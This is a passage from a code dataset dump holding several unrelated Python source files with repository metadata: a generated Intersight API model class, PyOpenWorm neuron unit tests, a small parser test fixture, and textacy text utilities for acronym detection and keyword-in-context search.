and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('class_id',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('object_type',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('admin_speed',): {
'AUTO': "Auto",
'1GBPS': "1Gbps",
'10GBPS': "10Gbps",
'25GBPS': "25Gbps",
'40GBPS': "40Gbps",
'100GBPS': "100Gbps",
},
('fec',): {
'AUTO': "Auto",
'CL91': "Cl91",
'CL74': "Cl74",
},
}
validations = {
('aggregate_port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 0,
},
('port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 1,
},
('slot_id',): {
'inclusive_maximum': 5,
'inclusive_minimum': 1,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'class_id': (str,), # noqa: E501
'object_type': (str,), # noqa: E501
'admin_speed': (str,), # noqa: E501
'fec': (str,), # noqa: E501
'account_moid': (str,), # noqa: E501
'create_time': (datetime,), # noqa: E501
'domain_group_moid': (str,), # noqa: E501
'mod_time': (datetime,), # noqa: E501
'moid': (str,), # noqa: E501
'owners': ([str], none_type,), # noqa: E501
'shared_scope': (str,), # noqa: E501
'tags': ([MoTag], none_type,), # noqa: E501
'version_context': (MoVersionContext,), # noqa: E501
'ancestors': ([MoBaseMoRelationship], none_type,), # noqa: E501
'parent': (MoBaseMoRelationship,), # noqa: E501
'permission_resources': ([MoBaseMoRelationship], none_type,), # noqa: E501
'display_names': (DisplayNames,), # noqa: E501
'aggregate_port_id': (int,), # noqa: E501
'port_id': (int,), # noqa: E501
'slot_id': (int,), # noqa: E501
'port_policy': (FabricPortPolicyRelationship,), # noqa: E501
}
@cached_property
def discriminator():
lazy_import()
val = {
'fabric.ApplianceRole': FabricApplianceRole,
'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
'fabric.UplinkRole': FabricUplinkRole,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId', # noqa: E501
'object_type': 'ObjectType', # noqa: E501
'admin_speed': 'AdminSpeed', # noqa: E501
'fec': 'Fec', # noqa: E501
'account_moid': 'AccountMoid', # noqa: E501
'create_time': 'CreateTime', # noqa: E501
'domain_group_moid': 'DomainGroupMoid', # noqa: E501
'mod_time': 'ModTime', # noqa: E501
'moid': 'Moid', # noqa: E501
'owners': 'Owners', # noqa: E501
'shared_scope': 'SharedScope', # noqa: E501
'tags': 'Tags', # noqa: E501
'version_context': 'VersionContext', # noqa: E501
'ancestors': 'Ancestors', # noqa: E501
'parent': 'Parent', # noqa: E501
'permission_resources': 'PermissionResources', # noqa: E501
'display_names': 'DisplayNames', # noqa: E501
'aggregate_port_id': 'AggregatePortId', # noqa: E501
'port_id': 'PortId', # noqa: E501
'slot_id': 'SlotId', # noqa: E501
'port_policy': 'PortPolicy', # noqa: E501
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, class_id, object_type, *args, **kwargs): # noqa: E501
"""FabricTransceiverRole - a model defined in OpenAPI
Args:
class_id (str): The fully-qualified name of the instantiated, concrete type. This property is used as a discriminator to identify the type of the payload when marshaling and unmarshaling data. The enum values provides the list of concrete types that can be instantiated from this abstract type.
object_type (str): The fully-qualified name of the instantiated, concrete type. The value should be the same as the 'ClassId' property. The enum values provides the list of concrete types that can be instantiated from this abstract type.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
admin_speed (str): Admin configured speed for the port. * `Auto` - Admin configurable speed AUTO ( default ). * `1Gbps` - Admin configurable speed 1Gbps. * `10Gbps` - Admin configurable speed 10Gbps. * `25Gbps` - Admin configurable speed 25Gbps. * `40Gbps` - Admin configurable speed 40Gbps. * `100Gbps` - Admin configurable speed 100Gbps.. [optional] if omitted the server will use the default value of "Auto" # noqa: E501
fec (str): Forward error correction configuration for the port. * `Auto` - Forward error correction option 'Auto'. * `Cl91` - Forward error correction option 'cl91'. * `Cl74` - Forward error correction option 'cl74'.. [optional] if omitted the server will use the default value of "Auto" # noqa: E501
account_moid (str): The Account ID for this managed object.. [optional] # noqa: E501
create_time (datetime): The time when this managed object was created.. [optional] # noqa: E501
domain_group_moid (str): The DomainGroup ID for this managed object.. [optional] # noqa: E501
mod_time (datetime): The time when this managed object was last modified.. [optional] # noqa: E501
moid (str): The unique identifier of this Managed Object instance.. [optional] # noqa: E501
owners ([str], none_type): [optional] # noqa: E501
shared_scope (str): Intersight provides pre-built workflows, tasks and policies to end users through global catalogs. Objects that are made available through global catalogs are said to have a 'shared' ownership. Shared objects are either made globally available to all end users or restricted to end users based on their license entitlement. Users can use this property to differentiate the scope (global or a specific license tier) to which a shared MO belongs.. [optional] # noqa: E501
tags ([MoTag], none_type): [optional] # noqa: E501
version_context (MoVersionContext): [optional] # noqa: E501
ancestors ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
parent (MoBaseMoRelationship): [optional] # noqa: E501
permission_resources ([MoBaseMoRelationship], none_type): An array of relationships to moBaseMo resources.. [optional] # noqa: E501
display_names (DisplayNames): [optional] # noqa: E501
aggregate_port_id (int): Breakout port Identifier of the Switch Interface. When a port is not configured as a breakout port, the aggregatePortId is set to 0, and unused. When a port is configured as a breakout port, the 'aggregatePortId' port number as labeled on the equipment, e.g. the id of the port on the switch.. [optional] # noqa: E501
port_id (int): Port Identifier of the Switch/FEX/Chassis Interface. When a port is not configured as a breakout port, the portId is the port number as labeled on the equipment, e.g. the id of the port on the switch, FEX or chassis. When a port is configured as a breakout port, the 'portId' represents the port id on the fanout side of the breakout cable.. [optional] # noqa: E501
slot_id (int): Slot Identifier of the Switch/FEX/Chassis Interface.. [optional] # noqa: E501
port_policy (FabricPortPolicyRelationship): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'class_id': class_id,
'object_type': object_type,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
FabricPortRole,
FabricTransceiverRoleAllOf,
],
'oneOf': [
],
}
| 54.184438
| 1,678
| 0.636794
|
import re
import sys
from intersight.model_utils import (
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from intersight.model.display_names import DisplayNames
from intersight.model.fabric_appliance_role import FabricApplianceRole
from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
from intersight.model.fabric_port_role import FabricPortRole
from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
from intersight.model.fabric_uplink_role import FabricUplinkRole
from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
from intersight.model.mo_tag import MoTag
from intersight.model.mo_version_context import MoVersionContext
globals()['DisplayNames'] = DisplayNames
globals()['FabricApplianceRole'] = FabricApplianceRole
globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
globals()['FabricPortRole'] = FabricPortRole
globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
globals()['FabricUplinkRole'] = FabricUplinkRole
globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
globals()['MoTag'] = MoTag
globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
allowed_values = {
('class_id',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('object_type',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('admin_speed',): {
'AUTO': "Auto",
'1GBPS': "1Gbps",
'10GBPS': "10Gbps",
'25GBPS': "25Gbps",
'40GBPS': "40Gbps",
'100GBPS': "100Gbps",
},
('fec',): {
'AUTO': "Auto",
'CL91': "Cl91",
'CL74': "Cl74",
},
}
validations = {
('aggregate_port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 0,
},
('port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 1,
},
('slot_id',): {
'inclusive_maximum': 5,
'inclusive_minimum': 1,
},
}
@cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,)
_nullable = False
@cached_property
def openapi_types():
lazy_import()
return {
'class_id': (str,),
'object_type': (str,),
'admin_speed': (str,),
'fec': (str,),
'account_moid': (str,),
'create_time': (datetime,),
'domain_group_moid': (str,),
'mod_time': (datetime,),
'moid': (str,),
'owners': ([str], none_type,),
'shared_scope': (str,),
'tags': ([MoTag], none_type,),
'version_context': (MoVersionContext,),
'ancestors': ([MoBaseMoRelationship], none_type,),
'parent': (MoBaseMoRelationship,),
'permission_resources': ([MoBaseMoRelationship], none_type,),
'display_names': (DisplayNames,),
'aggregate_port_id': (int,),
'port_id': (int,),
'slot_id': (int,),
'port_policy': (FabricPortPolicyRelationship,),
}
@cached_property
def discriminator():
lazy_import()
val = {
'fabric.ApplianceRole': FabricApplianceRole,
'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
'fabric.UplinkRole': FabricUplinkRole,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId',
'object_type': 'ObjectType',
'admin_speed': 'AdminSpeed',
'fec': 'Fec',
'account_moid': 'AccountMoid',
'create_time': 'CreateTime',
'domain_group_moid': 'DomainGroupMoid',
'mod_time': 'ModTime',
'moid': 'Moid',
'owners': 'Owners',
'shared_scope': 'SharedScope',
'tags': 'Tags',
'version_context': 'VersionContext',
'ancestors': 'Ancestors',
'parent': 'Parent',
'permission_resources': 'PermissionResources',
'display_names': 'DisplayNames',
'aggregate_port_id': 'AggregatePortId',
'port_id': 'PortId',
'slot_id': 'SlotId',
'port_policy': 'PortPolicy',
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
    @convert_js_args_to_python_args
    def __init__(self, class_id, object_type, *args, **kwargs):
        """Instantiate the composed model.

        Args:
            class_id (str): concrete type discriminator value.
            object_type (str): concrete object type.
            **kwargs: remaining model properties; underscore-prefixed
                keywords below configure validation/deserialization.

        Raises:
            ApiTypeError: if positional arguments (other than the two
                required ones) are supplied.
        """
        # Pop the framework-internal configuration keywords so that only
        # real model properties remain in ``kwargs``.
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        # Track visited classes to break cycles when walking composed schemas.
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        constant_args = {
            '_check_type': _check_type,
            '_path_to_item': _path_to_item,
            '_spec_property_naming': _spec_property_naming,
            '_configuration': _configuration,
            '_visited_composed_classes': self._visited_composed_classes,
        }
        required_args = {
            'class_id': class_id,
            'object_type': object_type,
        }
        model_args = {}
        model_args.update(required_args)
        model_args.update(kwargs)
        # Distribute the supplied values over the allOf/anyOf/oneOf
        # component instances of the composed schema.
        composed_info = validate_get_composed_info(
            constant_args, model_args, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        unused_args = composed_info[3]
        for var_name, var_value in required_args.items():
            setattr(self, var_name, var_value)
        for var_name, var_value in kwargs.items():
            # Optionally drop unknown keys when the configuration asks for it
            # and no additional-properties model would accept them.
            if var_name in unused_args and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        not self._additional_properties_model_instances:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
    @cached_property
    def _composed_schemas():
        """Schema composition (allOf/anyOf/oneOf) for this model."""
        # lazy-load referenced model classes before building the mapping
        lazy_import()
        return {
            'anyOf': [
            ],
            'allOf': [
                FabricPortRole,
                FabricTransceiverRoleAllOf,
            ],
            'oneOf': [
            ],
        }
| true
| true
|
f7191914c7488e7767557e9c0a804a86c906515e
| 4,350
|
py
|
Python
|
tests/NeuronTest.py
|
jaideep-seth/PyOpenWorm
|
c36baeda9590334ba810296934973da34f0eab78
|
[
"MIT"
] | 1
|
2019-03-22T12:02:36.000Z
|
2019-03-22T12:02:36.000Z
|
tests/NeuronTest.py
|
BioComSoftware/PyOpenWorm
|
32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f
|
[
"MIT"
] | null | null | null |
tests/NeuronTest.py
|
BioComSoftware/PyOpenWorm
|
32084f3570b4ea7fbdb1a4d20bd469d4af6ab28f
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
    """Integration tests for the Neuron data object and its relationships."""
    # Classes contextualized into self.ctx by the _DataTest machinery.
    ctx_classes = (Neuron, Connection)
    def setUp(self):
        _DataTest.setUp(self)
        # Shorthand factory: build a context-bound Neuron by name.
        self.neur = lambda x: self.ctx.Neuron(name=x)
    def test_Cell(self):
        """A Neuron is a subtype of Cell."""
        do = self.neur('BDUL')
        self.assertTrue(isinstance(do, Cell))
    def test_receptors(self):
        """A saved receptor annotation can be queried back by name."""
        n = self.neur('AVAL')
        n.receptor('GLR-2')
        self.save()
        self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
    def test_same_name_same_id(self):
        """
        Test that two Neuron objects with the same name have the same
        identifier. Saves us from having too many inserts of the same object.
        """
        c = Neuron(name="boots")
        c1 = Neuron(name="boots")
        self.assertEqual(c.identifier, c1.identifier)
    def test_type(self):
        """A saved neuron type can be queried back."""
        n = self.neur('AVAL')
        n.type('interneuron')
        self.save()
        self.assertEqual('interneuron', self.neur('AVAL').type.one())
    def test_name(self):
        """
        Test that the name property is set when the neuron is initialized
        with it
        """
        self.assertEqual('AVAL', self.neur('AVAL').name())
        self.assertEqual('AVAR', self.neur('AVAR').name())
    def test_neighbor(self):
        """Neighbors are visible both before and after saving."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        neighbors = list(n.neighbor())
        self.assertIn(self.neur('PVCL'), neighbors)
        self.save()
        self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
    def test_neighbor_count(self):
        """count() on a saved neighbor relationship finds one match."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        self.save()
        p = self.ctx.Neuron()
        self.neur('AVAL').neighbor(p)
        self.assertEqual(1, p.count())
    def test_neighbor_count_staged(self):
        """count() works on a staged (unsaved) neighbor relationship."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        self.assertEqual(1, n.neighbor.count())
    def test_neighbor_count_context_staged(self):
        """Staged neighbors are not visible from an unrelated context."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        ctx1 = Context(ident='http://example.org/ctx1')
        self.assertEqual(0, ctx1(n).neighbor.count())
    def test_connection_count(self):
        """count() on a saved connection finds one match."""
        n = self.neur('AVAL')
        n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
        self.save()
        self.assertEqual(1, self.neur('AVAL').connection.count())
    def test_connection_count_staged(self):
        """count() works on a staged (unsaved) connection."""
        n = self.neur('AVAL')
        n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
        self.assertEqual(1, n.connection.count())
    def test_neighbor_context(self):
        """Neighbors staged in one context are invisible from another."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        ctx1 = Context(ident='http://example.org/ctx1')
        n0.neighbor(n1)
        self.assertEqual(set(), set(ctx1(n0).neighbor()))
    def test_connection_get_staged(self):
        """A fully-specified staged connection is returned by connection()."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
        self.assertEqual(1, len(n0.connection()))
    def test_connection_only_defined(self):
        """An under-specified Connection is not returned by connection()."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n0.connection(self.ctx.Connection())
        self.assertEqual(0, len(n0.connection()))
    def test_connection_context(self):
        """Connections staged in one context are invisible from another."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        ctx1 = Context(ident='http://example.org/ctx1')
        n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
        self.assertEqual(set(), set(ctx1(n0).connection()))
    def test_init_from_lineage_name(self):
        """A neuron saved with a lineage name can be recovered by it."""
        c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
        self.save()
        # Debug output: dump the stored graph quads for inspection.
        for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
            print(' '.join(y.n3() for y in x))
        c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
        print(c.context)
        self.assertEqual(c.name(), 'ADAL')
| 35.365854
| 85
| 0.624828
|
from __future__ import print_function
from __future__ import absolute_import
from .DataTestTemplate import _DataTest
from PyOpenWorm.neuron import Neuron
from PyOpenWorm.cell import Cell
from PyOpenWorm.connection import Connection
from PyOpenWorm.context import Context
class NeuronTest(_DataTest):
    """Integration tests for the Neuron data object and its relationships."""
    # Classes contextualized into self.ctx by the _DataTest machinery.
    ctx_classes = (Neuron, Connection)
    def setUp(self):
        _DataTest.setUp(self)
        # Shorthand factory: build a context-bound Neuron by name.
        self.neur = lambda x: self.ctx.Neuron(name=x)
    def test_Cell(self):
        """A Neuron is a subtype of Cell."""
        do = self.neur('BDUL')
        self.assertTrue(isinstance(do, Cell))
    def test_receptors(self):
        """A saved receptor annotation can be queried back by name."""
        n = self.neur('AVAL')
        n.receptor('GLR-2')
        self.save()
        self.assertIn('GLR-2', list(self.neur('AVAL').receptors()))
    def test_same_name_same_id(self):
        """Two Neurons with the same name share one identifier."""
        c = Neuron(name="boots")
        c1 = Neuron(name="boots")
        self.assertEqual(c.identifier, c1.identifier)
    def test_type(self):
        """A saved neuron type can be queried back."""
        n = self.neur('AVAL')
        n.type('interneuron')
        self.save()
        self.assertEqual('interneuron', self.neur('AVAL').type.one())
    def test_name(self):
        """The name property is set at initialization."""
        self.assertEqual('AVAL', self.neur('AVAL').name())
        self.assertEqual('AVAR', self.neur('AVAR').name())
    def test_neighbor(self):
        """Neighbors are visible both before and after saving."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        neighbors = list(n.neighbor())
        self.assertIn(self.neur('PVCL'), neighbors)
        self.save()
        self.assertIn(self.neur('PVCL'), list(self.neur('AVAL').neighbor()))
    def test_neighbor_count(self):
        """count() on a saved neighbor relationship finds one match."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        self.save()
        p = self.ctx.Neuron()
        self.neur('AVAL').neighbor(p)
        self.assertEqual(1, p.count())
    def test_neighbor_count_staged(self):
        """count() works on a staged (unsaved) neighbor relationship."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        self.assertEqual(1, n.neighbor.count())
    def test_neighbor_count_context_staged(self):
        """Staged neighbors are not visible from an unrelated context."""
        n = self.neur('AVAL')
        n.neighbor(self.neur('PVCL'), syntype='send')
        ctx1 = Context(ident='http://example.org/ctx1')
        self.assertEqual(0, ctx1(n).neighbor.count())
    def test_connection_count(self):
        """count() on a saved connection finds one match."""
        n = self.neur('AVAL')
        n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
        self.save()
        self.assertEqual(1, self.neur('AVAL').connection.count())
    def test_connection_count_staged(self):
        """count() works on a staged (unsaved) connection."""
        n = self.neur('AVAL')
        n.connection(self.ctx.Connection(n, self.neur('PVCL'), syntype='send'))
        self.assertEqual(1, n.connection.count())
    def test_neighbor_context(self):
        """Neighbors staged in one context are invisible from another."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        ctx1 = Context(ident='http://example.org/ctx1')
        n0.neighbor(n1)
        self.assertEqual(set(), set(ctx1(n0).neighbor()))
    def test_connection_get_staged(self):
        """A fully-specified staged connection is returned by connection()."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
        self.assertEqual(1, len(n0.connection()))
    def test_connection_only_defined(self):
        """An under-specified Connection is not returned by connection()."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n0.connection(self.ctx.Connection())
        self.assertEqual(0, len(n0.connection()))
    def test_connection_context(self):
        """Connections staged in one context are invisible from another."""
        n0 = self.ctx.Neuron(name='NEURON0')
        n1 = self.ctx.Neuron(name='NEURON1')
        ctx1 = Context(ident='http://example.org/ctx1')
        n0.connection(self.ctx.Connection(pre_cell=n0, post_cell=n1, syntype='send'))
        self.assertEqual(set(), set(ctx1(n0).connection()))
    def test_init_from_lineage_name(self):
        """A neuron saved with a lineage name can be recovered by it."""
        c = self.ctx.Neuron(lineageName="AB plapaaaap", name="ADAL")
        self.save()
        # Debug output: dump the stored graph quads for inspection.
        for x in self.TestConfig['rdf.graph'].quads((None, None, None, None)):
            print(' '.join(y.n3() for y in x))
        c = self.context.stored(Neuron)(lineageName="AB plapaaaap")
        print(c.context)
        self.assertEqual(c.name(), 'ADAL')
| true
| true
|
f719199aa68ef685b796249b0f94249df6e5c02f
| 105
|
py
|
Python
|
tests/parser/query.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/query.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/query.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# Parser round-trip fixture: the parser must echo this ASP program
# (a fact, a disjunctive rule, a normal rule, and a query) back unchanged.
input = """
a.
x | d :- a.
c :- b.
c?
"""
# Expected parser output: identical to the input.
output = """
a.
x | d :- a.
c :- b.
c?
"""
| 5.526316
| 12
| 0.238095
|
# Parser round-trip fixture: the parser must echo this ASP program back unchanged.
input = """
a.
x | d :- a.
c :- b.
c?
"""
# Expected parser output: identical to the input.
output = """
a.
x | d :- a.
c :- b.
c?
"""
| true
| true
|
f7191a9344d5198ccde86f8f184716fe9107a381
| 5,646
|
py
|
Python
|
textacy/text_utils.py
|
tbsexton/textacy
|
964614213c7261f91f09c106334269388d45f790
|
[
"Apache-2.0"
] | null | null | null |
textacy/text_utils.py
|
tbsexton/textacy
|
964614213c7261f91f09c106334269388d45f790
|
[
"Apache-2.0"
] | null | null | null |
textacy/text_utils.py
|
tbsexton/textacy
|
964614213c7261f91f09c106334269388d45f790
|
[
"Apache-2.0"
] | null | null | null |
"""
Text Utils
----------
Set of small utility functions that take text strings as input.
"""
import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
    """
    Decide whether a single token qualifies as an acronym.

    Args:
        token: Single word to check for acronym-ness.
        exclude: Known false positives; tokens in this set are rejected
            even when they would otherwise qualify.

    Returns:
        True if ``token`` looks like an acronym, False otherwise.
    """
    # explicit deny-list takes priority over all structural checks
    if exclude and token in exclude:
        return False
    # empty strings and anything containing a space are rejected outright
    if not token or " " in token:
        return False
    # a 2-character acronym must be fully upper-case
    if len(token) == 2 and not token.isupper():
        return False
    # all-digit tokens are numbers, not acronyms
    if token.isdigit():
        return False
    # require at least one upper-case letter, or a digit at either end
    has_upper = any(ch.isupper() for ch in token)
    digit_at_edge = token[0].isdigit() or token[-1].isdigit()
    if not has_upper and not digit_at_edge:
        return False
    # between 2 and 10 alphanumeric characters overall
    n_alnum = sum(1 for ch in token if ch.isalnum())
    if not 2 <= n_alnum <= 10:
        return False
    # finally, only certain combinations of letters, digits, and '&/.-'
    return constants.RE_ACRONYM.match(token) is not None
def keyword_in_context(
    text: str,
    keyword: str,
    *,
    ignore_case: bool = True,
    window_width: int = 50,
    print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
    """
    Search for ``keyword`` in ``text`` via regular expression, returning or
    printing strings spanning ``window_width`` characters before and after
    each occurrence of keyword.

    Args:
        text: Text in which to search for ``keyword``.
        keyword: Technically, any valid regular expression string should work,
            but usually this is a single word or short phrase: "spam",
            "spam and eggs"; to account for variations, use regex:
            "[Ss]pam (and|&) [Ee]ggs?"

            .. note:: If keyword contains special characters, be sure to escape them!

        ignore_case: If True, ignore letter case in ``keyword`` matching.
        window_width: Number of characters on either side of ``keyword``
            to include as "context".
        print_only: If True, print all results with nice formatting and
            return None; if False, return a generator of raw
            (pre, kw, post) string triples.

    Returns:
        None when ``print_only`` is True; otherwise a generator of 3-tuples
        of prior context, the match itself, and posterior context.
    """
    flags = re.IGNORECASE if ignore_case is True else 0

    def _matches() -> Iterable[Tuple[str, str, str]]:
        # yields (pre, kw, post) for every regex match, clamping the
        # pre-context at the start of the text
        for match in re.finditer(keyword, text, flags=flags):
            yield (
                text[max(0, match.start() - window_width) : match.start()],
                match.group(),
                text[match.end() : match.end() + window_width],
            )

    if print_only is True:
        # Bug fix: previously a bare ``yield`` elsewhere in this function's
        # body made the *whole* function a generator, so calling it with
        # print_only=True returned an unconsumed generator and never printed.
        # Printing is now eager, as documented.
        for pre, kw, post in _matches():
            print(
                "{pre} {kw} {post}".format(
                    pre=pre.rjust(window_width),
                    kw=kw,
                    post=post.ljust(window_width),
                )
            )
        return None
    return _matches()


KWIC = keyword_in_context
